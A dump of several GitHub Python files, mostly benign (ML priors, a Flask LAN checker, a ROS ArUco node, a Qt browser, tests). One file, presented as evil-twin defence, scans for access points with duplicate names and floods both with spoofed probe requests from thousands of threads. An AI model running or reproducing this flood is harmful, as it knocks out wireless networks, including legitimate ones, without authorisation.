LaplaceUniform(Laplace):\n def __init__(self, shape, loc, scale, gradient_clip=1.):\n scale_prior = Uniform(shape=[], low=0., high=scale*2.)\n with torch.no_grad():\n scale_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale_prior)\n\n\nclass StudentTGamma(StudentT):\n def __init__(self, shape, loc, scale, rate=1., df=2, gradient_clip=1.):\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale_prior, df=df)\n\n \nclass StudentTUniform(StudentT):\n def __init__(self, shape, loc, scale, df=2, gradient_clip=1.):\n scale_prior = Uniform(shape=[], low=0., high=scale*2.)\n with torch.no_grad():\n scale_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale_prior, df=df)\n \n \nclass GenNormUniform(GenNorm):\n def __init__(self, shape, loc, scale, beta=1., gradient_clip=1.):\n beta_prior = Uniform(shape=[], low=0., high=beta*2.)\n with torch.no_grad():\n beta_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale, beta=beta_prior)\n\n \nclass Horseshoe(Normal):\n def __init__(self, shape, loc, scale, hyperscale=1., gradient_clip=1.):\n scale_prior = HalfCauchy(shape=[], scale=hyperscale, multiplier=scale)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(1.))\n super().__init__(shape, loc, scale_prior)\n","repo_name":"ratschlab/bnn_priors","sub_path":"bnn_priors/prior/hierarchical.py","file_name":"hierarchical.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"27495144993","text":"m:int ; n: int\n\nm = int(input(\"Qual a quantidade de linhas da matriz? \"))\nn = int(input(\"Qual a quantidade de colunas da matriz? 
\"))\n\nmatriz: [[int]] = [[0 for x in range(n)] for x in range(m)]\n\nfor i in range(m):\n\tfor j in range(n):\n\t\tmatriz[i][j] = int(input(f\"Elemento [{i},{j}]: \"))\n\nprint(\"VALORES NEGATIVOS:\")\n\nfor i in range(m):\n\tfor j in range(n):\n\t\tif matriz[i][j] < 0:\n\t\t\tprint(matriz[i][j])","repo_name":"acenelio/curso-algoritmos","sub_path":"python/negativos_matriz.py","file_name":"negativos_matriz.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"pt","doc_type":"code","stars":363,"dataset":"github-code","pt":"53"} +{"seq_id":"42713292707","text":"# _*_ coding: utf-8 _*_\n__author__ = 'rentingsong'\n__date__ = '2020/12/29 21:45'\n\"\"\"\nfunction: 判断两个IP是否是同一局域网\nversion: 1.0\n原理: 如果两个IP的网络标识是一样的,则这两个IP属于同一局域网\n\"\"\"\nfrom flask import render_template\nfrom flask import request\nfrom LAN import LAN_blue\n\n\ndef decimal_to_binary(decimal):\n \"\"\"\n 将一个十进制数转换为二进制数\n :param decimal: 十进制数\n :return: 十进制数转换为二进制的01字符串\n \"\"\"\n tmp = list()\n while decimal != 0:\n tmp.append(decimal % 2)\n decimal = decimal // 2\n tmp.reverse()\n res = \"\".join([str(num) for num in tmp])\n if len(res) < 8:\n res = \"\".join([(\"0\" * (8 - len(res))), res])\n return res\n\n\ndef bitwise_and(str1, str2):\n \"\"\"\n 将两个01字符串按位与,例如11110000 & 11111111 = 11110000\n :param str1: 11110000\n :param str2: 11111111\n :return: 11110000\n \"\"\"\n # 按位与存到临时变量tmp\n tmp = list(map(lambda x, y: int(x) and int(y), str1, str2))\n # 将整数数组转换为字符数组\n res = [str(x) for x in tmp]\n return \"\".join(res)\n\n\ndef bitwise_negation(my_string, x, y):\n \"\"\"\n 字符串按位取反,比如10101010,取反之后为01010101\n :param my_string: 原始字符串,例如10101010\n :param x: 字符,1\n :param y: 字符,2\n :return: 返回取反之后的字符串,例如:01010101\n \"\"\"\n return my_string.replace(x, \"tmp\").replace(y, x).replace(\"tmp\", y)\n\n\ndef deal_address_and_mask(address, mask):\n \"\"\"\n 返回IP地址和掩码转换为二进制之后的值\n :param address: IPV4地址\n :param mask: 掩码\n :return: ip_address_to_bin, subnet_mask_to_bin\n \"\"\"\n ip_address_to_bin = list()\n subnet_mask_to_bin = list()\n for i in address.split('.'): # 将IP地址分割,每一位进行二进制转换\n # print(\"IP 地址{0}\".format(i))\n # print(\"IP 二进制{0}\".format(decimal_to_binary(int(i))))\n ip_address_to_bin.append(decimal_to_binary(int(i)))\n for i in mask.split('.'):\n # print(\"掩码{0}\".format(i))\n # print(\"掩码 二进制{0}\".format(decimal_to_binary(int(i))))\n subnet_mask_to_bin.append(decimal_to_binary(int(i)))\n return ip_address_to_bin, subnet_mask_to_bin\n\n\n@LAN_blue.route('/lan_index')\ndef lan_index():\n return render_template('LAN/LAN_index.html')\n\n\n@LAN_blue.route('/judge_lan', methods=['GET', 'POST'])\ndef judge_lan():\n if request.method == \"POST\":\n # 获取IP1地址和掩码并解析: 将地址和掩码分别用点号分割,一个一个进行二进制转换,保存到数组中\n ip_address1 = request.form['ip_address1']\n print(\"输入的IP地址1:{0}\".format(ip_address1))\n subnet_mask1 = request.form['subnet_mask1']\n print(\"输入的掩码1:{0}\".format(subnet_mask1))\n ip_address1_to_bin, subnet_mask1_to_bin = deal_address_and_mask(ip_address1, subnet_mask1)\n print(\"IP地址1转换为二进制:{0}\".format(ip_address1_to_bin))\n print(\"掩码1转换为二进制:{0}\".format(subnet_mask1_to_bin))\n\n # 求IPV4地址1的网络标识\n address1_net_id = list()\n for i in range(0, 4):\n print(\"ip {0} and mask {1} : {2}\".format(ip_address1_to_bin[i], subnet_mask1_to_bin[i], bitwise_and(ip_address1_to_bin[i], subnet_mask1_to_bin[i])))\n address1_net_id.append(bitwise_and(ip_address1_to_bin[i], subnet_mask1_to_bin[i]))\n print(\"网络标识{0}\".format(address1_net_id))\n\n # 求IP1主机标识: ip & 掩码取反\n print(\"子网掩码1{0}\".format(subnet_mask1_to_bin))\n 
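# Worked example (illustrative, not from the original file): the same-LAN test reduces to comparing 'IP AND mask' octet by octet.\n        # 192.168.1.10 with mask 255.255.255.0 gives the network ID ['11000000', '10101000', '00000001', '00000000'], i.e. 192.168.1.0;\n        # 192.168.1.77 under the same mask gives the identical four strings, so both hosts sit on the same LAN.\n        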
subnet_mask1_reverse = list()\n for ele in subnet_mask1_to_bin:\n subnet_mask1_reverse.append(bitwise_negation(ele, \"1\", \"0\"))\n print(\"子网掩码1取反{0}\".format(subnet_mask1_reverse))\n host1_id = list() # 主机标识\n for i in range(0, 4):\n host1_id.append(bitwise_and(ip_address1_to_bin[i], subnet_mask1_reverse[i]))\n print(\"主机1标识{0}\".format(host1_id))\n\n # 获取IP2地址和掩码并解析:将地址和掩码分别用点号分割,一个一个进行二进制转换,保存到数组中\n ip_address2 = request.form['ip_address2']\n subnet_mask2 = request.form['subnet_mask2']\n ip_address2_to_bin, subnet_mask2_to_bin = deal_address_and_mask(ip_address2, subnet_mask2)\n # 求IPV4地址2的网络标识\n address2_net_id = list()\n for i in range(0, 4):\n address2_net_id.append(bitwise_and(ip_address2_to_bin[i], subnet_mask2_to_bin[i]))\n # 求IP2主机标识\n subnet_mask2_reverse = list()\n for ele in subnet_mask2_to_bin:\n subnet_mask2_reverse.append(bitwise_negation(ele, \"1\", \"0\"))\n print(\"子网掩码2取反{0}\".format(subnet_mask1_reverse))\n host2_id = list() # 主机标识\n for i in range(0, 4):\n host2_id.append(bitwise_and(ip_address2_to_bin[i], subnet_mask2_reverse[i]))\n print(\"主机2标识{0}\".format(host2_id))\n\n msg = \"是同一局域网\"\n if address1_net_id == address2_net_id:\n msg = \"网络标识一样,是同一局域网!\"\n else:\n msg = \"网络标识不一样,不是同一局域网!\"\n\n return render_template('LAN/LAN_index.html', ip_address1=ip_address1, subnet_mask1=subnet_mask1,\n ip_address1_to_bin=ip_address1_to_bin, address1_net_id=address1_net_id, host1_id=host1_id,\n ip_address2=ip_address2, subnet_mask2=subnet_mask2, host2_id=host2_id,\n ip_address2_to_bin=ip_address2_to_bin, address2_net_id=address2_net_id,\n subnet_mask1_to_bin=subnet_mask1_to_bin, subnet_mask2_to_bin=subnet_mask2_to_bin, msg=msg)\n\n\nif __name__ == \"__main__\":\n # print(decimal_to_binary(253))\n pass\n","repo_name":"pine-r/tools-python","sub_path":"LAN/LAN.py","file_name":"LAN.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36872751362","text":"import unittest\nimport os\nfrom lz77 import LZ77\n\n\nclass TestLZ77Coding(unittest.TestCase):\n def setUp(self):\n self.path = os.path.join(os.getcwd(), \"kalevala.txt\")\n self.lz77 = LZ77(self.path)\n\n def test_compress_is_smaller(self):\n \"\"\"Tests if the compressed file size is at least 70 % smaller than the original file size\"\"\"\n original_file_size = os.path.getsize(os.path.join(os.getcwd(), \"kalevala.txt\"))\n compressed_file_size = os.path.getsize(os.path.join(os.getcwd(), \"lz77_compressed.bin\"))\n\n assert compressed_file_size/original_file_size <= 0.70\n\n def test_decompressed_is_same_as_original(self):\n with open(\"kalevala.txt\", \"r\", encoding=\"utf-8\")as original_file, open(\"lz77_decompressed.txt\", \"r\", encoding=\"utf-8\")as decompressed_file:\n original_string = original_file.read()\n decompressed_string = decompressed_file.read()\n\n assert original_string == decompressed_string","repo_name":"susannakinnunen/tiralabra-tiedontiivistys-algoritmit","sub_path":"src/tests/test_lz77_kalevala.py","file_name":"test_lz77_kalevala.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7218597493","text":"#!/usr/bin/env python3\n\n'''\n*****************************************************************************************\n*\n* \t\t===============================================\n* \t\t HolA Bot (HB) Theme (eYRC 2022-23)\n* \t\t===============================================\n*\n* This script should be 
used to implement Task 0 of HolA Bot (HB) Theme (eYRC 2022-23).\n*\n* This software is made available on an \"AS IS WHERE IS BASIS\".\n* Licensee/end user indemnifies and will keep e-Yantra indemnified from\n* any and all claim(s) that emanate from the use of the Software or\n* breach of the terms of this agreement.\n*\n*****************************************************************************************\n'''\n\n# Team ID:\t\tHB#2972\n# Author List:\t\tAbhoy, Abhijit, Harsha, Dhruv\n# Filename:\t\tfeedback.py\n# Functions:\n#\t\t\tcallback, main\n# Nodes:\t\tdetected_aruco, overhead_cam/image_raw\n\n\n######################## IMPORT MODULES ##########################\n\nimport numpy\t\t\t\t# If you find it required\nimport rospy \t\t\t\t\nfrom sensor_msgs.msg import Image \t# Image is the message type for images in ROS\nfrom cv_bridge import CvBridge\t# Package to convert between ROS and OpenCV Images\nimport cv2\t\t\t\t# OpenCV Library\nimport cv2.aruco as aruco\nimport math\t\t\t\t# If you find it required\nfrom geometry_msgs.msg import Pose2D\t# Required to publish ARUCO's detected position & orientation\n\n############################ GLOBALS #############################\n\naruco_publisher = rospy.Publisher('detected_aruco', Pose2D, queue_size=10)\naruco_msg = Pose2D()\nmarker_size=4\ntotal_markers=250\nkey=getattr(aruco,f'DICT_{marker_size}X{marker_size}_{total_markers}')\naruco_dict=aruco.Dictionary_get(key)\naruco_param=aruco.DetectorParameters_create()\n\n##################### FUNCTION DEFINITIONS #######################\n\n# NOTE : You may define multiple helper functions here and use in your code\n\ndef callback(data):\n\t# Bridge is Used to Convert ROS Image message to OpenCV image\n\tbr = CvBridge()\n\trospy.loginfo(\"receiving camera frame\")\n\tget_frame = br.imgmsg_to_cv2(data, \"mono8\")\t\t# Receiving raw image in a \"grayscale\" format\n\tcurrent_frame = cv2.resize(get_frame, (500, 500), interpolation = cv2.INTER_LINEAR)\n\tbbox,_,_=aruco.detectMarkers(get_frame,aruco_dict,parameters=aruco_param)\n\t\n\tpos=[0,0]\n\tif len(bbox)>0:\n\t\tfor i in range(4):\n\t\t\tpos[0]+=0.25*bbox[0][0][i][0]\n\t\t\tpos[1]+=0.25*bbox[0][0][i][1]\n\t\t\n\t\ty=(bbox[0][0][3][1])-(bbox[0][0][0][1])\n\t\tx=(bbox[0][0][3][0])-(bbox[0][0][0][0])\n\t\talign=math.atan2(x,y)\n\t\taruco_msg.x=pos[0]-639.5\n\t\taruco_msg.y=-pos[1]+640.5\n\t\taruco_msg.theta=align\n\t\taruco_publisher.publish(aruco_msg)\n\t############ ADD YOUR CODE HERE ############\n\n\t# INSTRUCTIONS & HELP : \n\t#\t-> Use OpenCV to find ARUCO MARKER from the IMAGE\n\t#\t-> You are allowed to use any other library for ARUCO detection, \n\t# but the code should be strictly written by your team and\n\t#\t your code should take image & publish coordinates on the topics as specified only. 
\n\t#\t-> Use basic high-school geometry of \"TRAPEZOIDAL SHAPES\" to find accurate marker coordinates & orientation :)\n\t#\t-> Observe the accuracy of aruco detection & handle every possible corner cases to get maximum scores !\n\n\t############################################\n\t \ndef main():\n\trospy.init_node('aruco_feedback_node') \n\trospy.Subscriber('overhead_cam/image_raw', Image, callback)\n\trospy.spin()\nif __name__ == '__main__':\n main()\n","repo_name":"arabhijit2003/eyantra_2022","sub_path":"eyrc22_hb_2972-master/eyrc-2022_hb_task2/scripts/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6166912465","text":"import config, os, webbrowser, re\r\nfrom util.NetworkUtil import NetworkUtil\r\nfrom util.TextUtil import TextUtil\r\nif config.qtLibrary == \"pyside6\":\r\n from PySide6.QtWebEngineWidgets import QWebEngineView\r\n from PySide6.QtWebEngineCore import QWebEngineProfile, QWebEnginePage\r\n from PySide6.QtGui import QGuiApplication, QKeySequence, QShortcut\r\n from PySide6.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QLineEdit\r\n from PySide6.QtCore import QUrl\r\nelse:\r\n from qtpy.QtWebEngineWidgets import QWebEngineView, QWebEngineProfile, QWebEnginePage\r\n from qtpy.QtGui import QGuiApplication\r\n from qtpy.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QLineEdit, QShortcut\r\n from qtpy.QtCore import QUrl\r\n from qtpy.QtGui import QKeySequence\r\n\r\nclass SimpleBrowser(QWidget):\r\n\r\n def __init__(self, parent, title=\"UniqueBible.app\", profileName=\"simplebrowser\"):\r\n super().__init__()\r\n self.parent = parent\r\n self.profileName = profileName\r\n # set title\r\n self.setWindowTitle(title)\r\n # set variables\r\n self.setupVariables()\r\n # setup interface\r\n self.setupUI()\r\n # set initial window size\r\n self.resize(QGuiApplication.primaryScreen().availableSize() * 3 / 4)\r\n # setup keyboard shortcuts\r\n self.setupKeyboardShortcuts()\r\n\r\n def setupKeyboardShortcuts(self):\r\n shortcut = QShortcut(QKeySequence(\"Ctrl+F\"), self)\r\n shortcut.activated.connect(self.toggleInstantHighlight)\r\n\r\n def setupVariables(self):\r\n self.home = None\r\n self.enableInstantHighlight = False\r\n self.urlString = \"\"\r\n\r\n def setupUI(self):\r\n mainLayout = QVBoxLayout()\r\n topLayout = QHBoxLayout()\r\n secondLayout = QHBoxLayout()\r\n mainLayout.addLayout(topLayout)\r\n mainLayout.addLayout(secondLayout)\r\n self.setLayout(mainLayout)\r\n\r\n # go home button\r\n icon = \"material/action/home/materialiconsoutlined/48dp/2x/outline_home_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"homePage\"])\r\n button.clicked.connect(lambda: self.setUrl(self.home))\r\n topLayout.addWidget(button)\r\n # go back button\r\n icon = \"material/image/navigate_before/materialiconsoutlined/48dp/2x/outline_navigate_before_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"youtube_back\"])\r\n button.clicked.connect(lambda: self.webview.page().triggerAction(QWebEnginePage.Back))\r\n topLayout.addWidget(button)\r\n # go forward button\r\n icon = \"material/image/navigate_next/materialiconsoutlined/48dp/2x/outline_navigate_next_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"youtube_forward\"])\r\n 
button.clicked.connect(lambda: self.webview.page().triggerAction(QWebEnginePage.Forward))\r\n topLayout.addWidget(button)\r\n # url entry\r\n self.addressBar = QLineEdit()\r\n self.addressBar.setClearButtonEnabled(True)\r\n self.addressBar.setToolTip(config.thisTranslation[\"enter_fullURL\"])\r\n self.addressBar.returnPressed.connect(self.addressEntered)\r\n topLayout.addWidget(self.addressBar)\r\n # highlight button\r\n icon = \"material/image/auto_fix_off/materialiconsoutlined/48dp/2x/outline_auto_fix_off_black_48dp.png\"\r\n self.highlightButton = config.mainWindow.getIconPushButton(icon)\r\n self.highlightButton.setToolTip(config.thisTranslation[\"instantHighlight\"])\r\n self.highlightButton.clicked.connect(self.toggleInstantHighlight)\r\n topLayout.addWidget(self.highlightButton)\r\n # reload button\r\n icon = \"material/navigation/refresh/materialiconsoutlined/48dp/2x/outline_refresh_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"menu_reload\"])\r\n button.clicked.connect(lambda: self.webview.page().triggerAction(QWebEnginePage.Reload))\r\n topLayout.addWidget(button)\r\n # open in web browser button\r\n icon = \"material/action/open_in_new/materialiconsoutlined/48dp/2x/outline_open_in_new_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"browser\"])\r\n button.clicked.connect(lambda: webbrowser.open(self.addressBar.text()))\r\n topLayout.addWidget(button)\r\n\r\n # find entry\r\n self.findBar = QLineEdit()\r\n self.findBar.setClearButtonEnabled(True)\r\n self.findBar.setToolTip(config.thisTranslation[\"menu5_searchItems\"])\r\n self.findBar.textChanged.connect(lambda: self.highlightContent(True))\r\n self.findBar.returnPressed.connect(lambda: self.highlightContent(True))\r\n secondLayout.addWidget(self.findBar)\r\n\r\n # go back button\r\n icon = \"material/image/navigate_before/materialiconsoutlined/48dp/2x/outline_navigate_before_black_48dp.png\"\r\n self.findButtonBackward = config.mainWindow.getIconPushButton(icon)\r\n self.findButtonBackward.setToolTip(config.thisTranslation[\"youtube_back\"])\r\n self.findButtonBackward.clicked.connect(lambda: self.highlightContent(False))\r\n secondLayout.addWidget(self.findButtonBackward)\r\n # go forward button\r\n icon = \"material/image/navigate_next/materialiconsoutlined/48dp/2x/outline_navigate_next_black_48dp.png\"\r\n self.findButtonForward = config.mainWindow.getIconPushButton(icon)\r\n self.findButtonForward.setToolTip(config.thisTranslation[\"youtube_forward\"])\r\n self.findButtonForward.clicked.connect(lambda: self.highlightContent(True))\r\n secondLayout.addWidget(self.findButtonForward)\r\n\r\n self.toggleInstantHighlight()\r\n\r\n # profile, webpage, and webview\r\n # set up a non-off-the-record profile that supports cookies\r\n profile = QWebEngineProfile(self.profileName, self)\r\n profile.setHttpCacheType(QWebEngineProfile.DiskHttpCache)\r\n profile.setPersistentCookiesPolicy(QWebEngineProfile.ForcePersistentCookies)\r\n storagePath = os.path.join(os.getcwd(), \"webstorage\")\r\n profile.setCachePath(os.path.join(storagePath, \"Cache\"))\r\n profile.setPersistentStoragePath(os.path.join(storagePath, \"PersistentStorage\"))\r\n homeDownloads = os.path.join(os.path.expanduser(\"~\"), \"Downloads\")\r\n homeDownload = os.path.join(os.path.expanduser(\"~\"), \"Download\")\r\n # set download path and handler of download request\r\n if os.path.isdir(homeDownloads):\r\n self.downloadPath = 
homeDownloads\r\n elif os.path.isdir(homeDownload):\r\n self.downloadPath = homeDownload\r\n else:\r\n self.downloadPath = os.path.join(storagePath, \"Downloads\")\r\n profile.setDownloadPath(self.downloadPath)\r\n profile.downloadRequested.connect(self.downloadRequested)\r\n # set up web engine page\r\n webpage = QWebEnginePage(profile, self)\r\n if config.qtLibrary == \"pyside6\":\r\n webpage.newWindowRequested.connect(self.newWindowRequested)\r\n else:\r\n webpage.createWindow = self.createWindow\r\n # set up webview\r\n self.webview = QWebEngineView()\r\n self.webview.setPage(webpage)\r\n # Alternately, construct a QWebEngineView with a QWebEnginePage directly in PySide6\r\n #self.webview = QWebEngineView(webpage)\r\n self.webview.urlChanged.connect(lambda url: self.addressBar.setText(url.toString()))\r\n self.webview.loadFinished.connect(self.loadFinished)\r\n mainLayout.addWidget(self.webview)\r\n\r\n def toggleInstantHighlight(self):\r\n def getInstantHighlightDisplay():\r\n if self.enableInstantHighlight:\r\n return config.mainWindow.getCrossplatformPath(\"material/image/auto_fix_normal/materialiconsoutlined/48dp/2x/outline_auto_fix_normal_black_48dp.png\")\r\n else:\r\n return config.mainWindow.getCrossplatformPath(\"material/image/auto_fix_off/materialiconsoutlined/48dp/2x/outline_auto_fix_off_black_48dp.png\")\r\n self.findBar.setVisible(self.enableInstantHighlight)\r\n self.findButtonBackward.setVisible(self.enableInstantHighlight)\r\n self.findButtonForward.setVisible(self.enableInstantHighlight)\r\n self.highlightButton.setStyleSheet(config.mainWindow.getQIcon(getInstantHighlightDisplay()))\r\n self.enableInstantHighlight = not self.enableInstantHighlight\r\n\r\n def highlightContent(self, forward):\r\n searchString = self.findBar.text().strip()\r\n if forward:\r\n self.webview.findText(searchString)\r\n else:\r\n self.webview.findText(searchString, QWebEnginePage.FindBackward)\r\n\r\n def downloadRequested(self, request):\r\n def isFinishedChanged(obj=None):\r\n if request.isFinished():\r\n os.system(f\"{config.open} {self.downloadPath}\")\r\n request.isFinishedChanged.connect(isFinishedChanged)\r\n request.accept()\r\n\r\n # work in PySide2 or PyQt5, but not in PySide6\r\n def createWindow(self, windowType):\r\n if windowType in (QWebEnginePage.WebBrowserWindow, QWebEnginePage.WebBrowserTab):\r\n newWindow = SimpleBrowser(config.mainWindow, \"New\", self.profileName)\r\n newWindow.show()\r\n return newWindow.webview.page()\r\n\r\n # work in PySide6, but not in PySide2 or PyQt5\r\n def newWindowRequested(self, request):\r\n newWindow = SimpleBrowser(config.mainWindow, \"New\", self.profileName)\r\n newWindow.setUrl(QUrl(request.requestedUrl()))\r\n newWindow.show()\r\n\r\n def setUrl(self, url):\r\n urlString = url.toString()\r\n if self.home is None:\r\n # set home link when the first link is opened\r\n self.home = url\r\n if url.isValid() and NetworkUtil.is_valid_url(urlString):\r\n #self.webview.setUrl(url)\r\n self.urlString = urlString\r\n self.webview.load(url)\r\n else:\r\n self.searchGoogle()\r\n\r\n def loadFinished(self, ok):\r\n if not ok and not self.urlString == self.home.toString() and not self.urlString.startswith(\"https://www.google.com/\"):\r\n self.searchGoogle()\r\n\r\n def searchGoogle(self):\r\n #if NetworkUtil.check_internet_connection():\r\n address = self.addressBar.text().strip()\r\n query = re.sub(\"^https://(.*?)[/]*$\", r\"\\1\", address)\r\n if not address == query:\r\n self.addressBar.setText(query)\r\n # search\r\n query = 
TextUtil.plainTextToUrl(query)\r\n url = QUrl(f\"https://www.google.com/search?q={query}\")\r\n self.webview.load(url)\r\n\r\n def addressEntered(self):\r\n address = self.addressBar.text()\r\n if address:\r\n if not \"://\" in address:\r\n address = f\"https://{address}\"\r\n self.setUrl(QUrl(address))\r\n","repo_name":"eliranwong/UniqueBible","sub_path":"gui/SimpleBrowser.py","file_name":"SimpleBrowser.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"4913154509","text":"tC = int(input())\nfor t in range(tC):\n n,k = [int(i) for i in input().split()]\n dogs = set()\n diffs = []\n for j in range(n):\n dogs.add(int(input()))\n\n dogs = sorted(list(dogs))\n for j in range(len(dogs)-1):\n diffs.append(dogs[j+1] - dogs[j])\n\n diffs = sorted(diffs)\n dogs = list(dogs)\n if k == 1:\n print(dogs[-1] - dogs[0])\n else:\n print(sum(diffs[:len(dogs)-k]))","repo_name":"kxu9gh/IEEE-Xtreme","sub_path":"dog2.py","file_name":"dog2.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10148682638","text":"import time\n\nfrom scapy.all import *\nimport os\nimport threading\nimport multiprocessing\n\nfrom scapy.layers.dot11 import Dot11Beacon, Dot11, RadioTap, Dot11Deauth, Dot11ProbeReq, Dot11Elt\n\n\"\"\"\ndefence module against evil twin, scan for duplicate networks and disconnect from them if found.\n\"\"\"\n\nnetwork_dict = {}\n# my_macs = [get_if_hwaddr(i) for i in get_if_list()]\nmy_macs = []\nduplicate_aps = {}\nunique_ap_names = {}\ninterface = ''\n\n\ndef sniffAP(packet):\n if packet.haslayer(Dot11Beacon):\n mac_addr = packet[Dot11].addr2\n ap_name = packet[Dot11].info.decode()\n stats = packet[Dot11Beacon].network_stats()\n channel = stats.get(\"channel\")\n if mac_addr not in network_dict.keys() and mac_addr not in my_macs:\n network_dict[mac_addr] = (mac_addr, ap_name, channel)\n print(f\"Found AP:{network_dict[mac_addr]}\")\n\n\n# traverse the networks we found, and look if two of them have the same name.\ndef find_duplicates():\n for mac_addr in network_dict:\n ap_name = network_dict[mac_addr][1]\n if ap_name in unique_ap_names.keys():\n print(f\"Duplicated network:\\nMAC:{mac_addr} | Name: {ap_name}\")\n duplicate_aps[\n mac_addr] = ap_name # insert both mac addresses into networks, since we don't know which is fake.\n # this is a mac address\n duplicate_aps[unique_ap_names[ap_name]] = ap_name\n else:\n unique_ap_names[ap_name] = mac_addr\n print(duplicate_aps)\n\n\ndef changeChannels(timeout):\n channel = 1\n counter = 0\n while True:\n # os command to switch channels.\n os.system(f\"iwconfig {interface} channel {channel}\")\n channel = channel % 14 + 1\n time.sleep(2)\n print(f\"scanning channel: {channel}\")\n counter += 1\n if counter == timeout:\n break\n\n\ndef setMonitor(interface):\n os.system(f\"sudo ifconfig {interface} down\")\n os.system(f\"sudo iwconfig {interface} mode monitor\")\n os.system(f\"sudo ifconfig {interface} up\")\n\n\ndef ddos(victim, iface):\n def disconnect():\n random_mac = RandMAC()\n ddos_pkt = RadioTap() / Dot11(addr1=victim, addr2=random_mac,\n addr3=random_mac) / Dot11ProbeReq() / Dot11Elt(ID=\"SSID\", info=\"\")\n # sendp since we are working on layer 2\n sendp(ddos_pkt, iface=iface, loop=1)\n\n keep_alive = []\n try:\n for i in range(0, 10000):\n thread = threading.Thread(target=disconnect)\n thread.start()\n keep_alive.append(thread)\n except:\n 
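# the bare except absorbs failures such as RuntimeError ('can't start new thread')\n        # once OS thread limits are hit, so the threads already started keep flooding the target.\n        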
pass\n\n\ndef defend(iface):\n global interface\n interface = iface\n setMonitor(interface)\n timeout = 60\n\n # ------- PART 1: SCAN FOR DUP NETWORKS ---------\n channel_changer = multiprocessing.Process(target=changeChannels, args=(timeout,), daemon=True)\n channel_changer.start()\n sniff(prn=sniffAP, timeout=timeout, iface=interface)\n channel_changer.join()\n # ---------------------------------------------------\n # ------ PART 2: Attack attacker :) -------\n find_duplicates()\n if len(duplicate_aps.keys()) > 0:\n print(\"Found duplicate APs - attacking both APs \")\n for dup_mac in duplicate_aps.keys():\n dc_process = multiprocessing.Process(target=ddos, args=(dup_mac, interface),\n daemon=True) # start the ddos thread\n dc_process.start()\n","repo_name":"ShmuelLa/Evil-Twin","sub_path":"defence_v3.py","file_name":"defence_v3.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28087727845","text":"import pyttsx3\nimport speech_recognition as sr\nfrom playsound import playsound\n\n\nclass Speak_Listen:\n def __init__(self):\n self.speech_engine = pyttsx3.init()\n self.speech_engine.setProperty(\"rate\", 150)\n\n self.r = sr.Recognizer()\n self.mic = sr.Microphone(device_index=2)\n\n def say(self, text):\n \"\"\"Uses pyttsx3 engine text-to-speech to to say 'text' argument\"\"\"\n # self.speech_engine.connect('finished-utterance', self.stop_speaking)\n print(text)\n self.speech_engine.say(text, \"speech\")\n self.speech_engine.runAndWait()\n \n def stop_speaking(self, name, completed):\n self.speech_engine.endLoop()\n\n def listen(self):\n \"\"\"Uses speech_recognition library to listen to get audio input and understand what the user is saying\"\"\"\n \n with self.mic as source:\n print(\"Listening\")\n self.r.non_speaking_duration = 0.5\n audio = self.r.listen(source, timeout=7, phrase_time_limit=5)\n \n return (self.r.recognize_google(audio))\n\nspeak_listen = Speak_Listen()","repo_name":"reybahl/Assistant","sub_path":"assistant_functions/speak_listen.py","file_name":"speak_listen.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"36506593878","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
